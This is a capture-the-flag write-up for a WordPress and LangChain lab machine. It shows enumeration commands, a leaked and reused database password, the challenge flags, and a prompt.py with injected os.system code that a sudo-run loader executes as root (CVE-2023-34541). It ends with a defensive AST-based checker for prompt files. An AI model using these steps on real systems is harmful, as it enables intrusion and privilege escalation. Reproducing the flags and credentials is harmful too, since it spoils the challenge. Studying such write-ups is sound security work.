2023 Business CTF: Lagmon

Challenge Information

Event: 2023 Business CTF
Category: FullPwn
Challenge: Lagmon
Difficulty: Very Easy

Summary

The target is a WordPress-based system with a LangChain integration whose prompt loader is vulnerable. Initial access comes from WordPress enumeration and discovery of the database credentials, followed by privilege escalation through the LangChain prompt-loading vulnerability (CVE-2023-34541) to achieve code execution as root.


Analysis

The system has multiple layers:

WordPress Setup:

  • Version 6.2.2 (latest as of 2023-05-20)
  • Astra theme 4.1.5
  • Database credentials exposed in wp-config.php

Database Credentials:

DB_NAME: pwndb
DB_USER: wordpress_user
DB_PASSWORD: SNJQvwWHCK
DB_HOST: localhost

Privilege Escalation:

  • The developer user reuses the database password for its system account
  • developer can run /opt/prompt_loader.py through sudo without a password
  • The prompt loader uses LangChain’s PromptTemplate with CommaSeparatedListOutputParser

Solution

Step 1: Initial Reconnaissance

nmap -sC -sV langmon.htb
# Reveals WordPress 6.2.2 on port 80
wpscan --url http://langmon.htb

Step 2: Discover WordPress Credentials

  • Access wp-admin or web root to find wp-config.php
  • Extract database credentials: SNJQvwWHCK

Step 3: Gain User Shell

su developer
# Password: SNJQvwWHCK
cat /home/developer/user.txt
# HTB{4lw4y5_upd473_y0ur_plu61n5}

Step 4: Exploit LangChain CVE-2023-34541

Create a malicious prompt file:

prompt.py
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate
_DECIDER_TEMPLATE = """..."""
import os
os.system('id') # Injected code
PROMPT = PromptTemplate(
    input_variables=["query", "table_names"],
    template=_DECIDER_TEMPLATE,
    output_parser=CommaSeparatedListOutputParser(),
)

Step 5: Execute with Sudo

sudo /opt/prompt_loader.py prompt.py
# Returns: uid=0(root) gid=0(root) groups=0(root)
# Access to root flag: HTB{7h3_m4ch1n35_5p34k_w3_h34r}

Key Takeaways

  • WordPress installations require careful configuration management
  • Reusing passwords across systems creates lateral movement paths
  • LangChain prompt templates can be exploited for code injection
  • Sudo privileges without proper output validation enable privilege escalation
  • Keep all software, especially plugins, updated
  • Never hardcode credentials in configuration files
  • LLM integrations introduce new attack surfaces
  • Sanitize all external inputs to prompt templates
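
A defender-side check for the kind of prompt.py shown in Step 4, as an added example that is not part of the original writeup or the challenge's code: it parses a Python prompt file with ast, without executing it, and reports every statement outside a small allowlist. The policy, the function names and the sample strings are assumptions made for illustration.

```python
import ast

# Assumed policy (hypothetical): a prompt file may only import from langchain,
# bind literals to names, and build objects from these constructors.
ALLOWED_CALLS = {"PromptTemplate", "CommaSeparatedListOutputParser"}

def _safe_value(node):
    """True for literals, plain names, and allowlisted keyword-only calls."""
    if isinstance(node, (ast.Constant, ast.Name)):
        return True
    if isinstance(node, (ast.List, ast.Tuple)):
        return all(_safe_value(e) for e in node.elts)
    if isinstance(node, ast.Call):
        return (isinstance(node.func, ast.Name) and node.func.id in ALLOWED_CALLS
                and not node.args
                and all(kw.arg and _safe_value(kw.value) for kw in node.keywords))
    return False

def audit_prompt_source(source):
    """Return a list of 'line N: reason' findings; empty means policy-clean."""
    findings = []
    for stmt in ast.parse(source).body:
        if isinstance(stmt, ast.ImportFrom):
            ok = (stmt.level == 0 and (stmt.module or "").split(".")[0] == "langchain"
                  and all(a.asname is None and a.name != "*" for a in stmt.names))
            why = "import outside langchain, aliased, or wildcard"
        elif isinstance(stmt, ast.Assign):
            ok = (all(isinstance(t, ast.Name) and t.id not in ALLOWED_CALLS
                      for t in stmt.targets) and _safe_value(stmt.value))
            why = "assignment of a non-literal or non-allowlisted value"
        else:
            ok, why = False, f"{type(stmt).__name__} statement not permitted"
        if not ok:
            findings.append(f"line {stmt.lineno}: {why}")
    return findings

# Constructed sample mirroring the writeup's prompt.py (template text elided).
MALICIOUS = '''from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate
_DECIDER_TEMPLATE = """..."""
import os
os.system('id')
PROMPT = PromptTemplate(
    input_variables=["query", "table_names"],
    template=_DECIDER_TEMPLATE,
    output_parser=CommaSeparatedListOutputParser(),
)
'''
CLEAN = MALICIOUS.replace("import os\nos.system('id')\n", "")
```

An allowlist like this is defense in depth. Loading prompts only from data formats such as JSON or YAML, and not granting sudo on a loader that accepts a user-supplied path, removes the code path entirely.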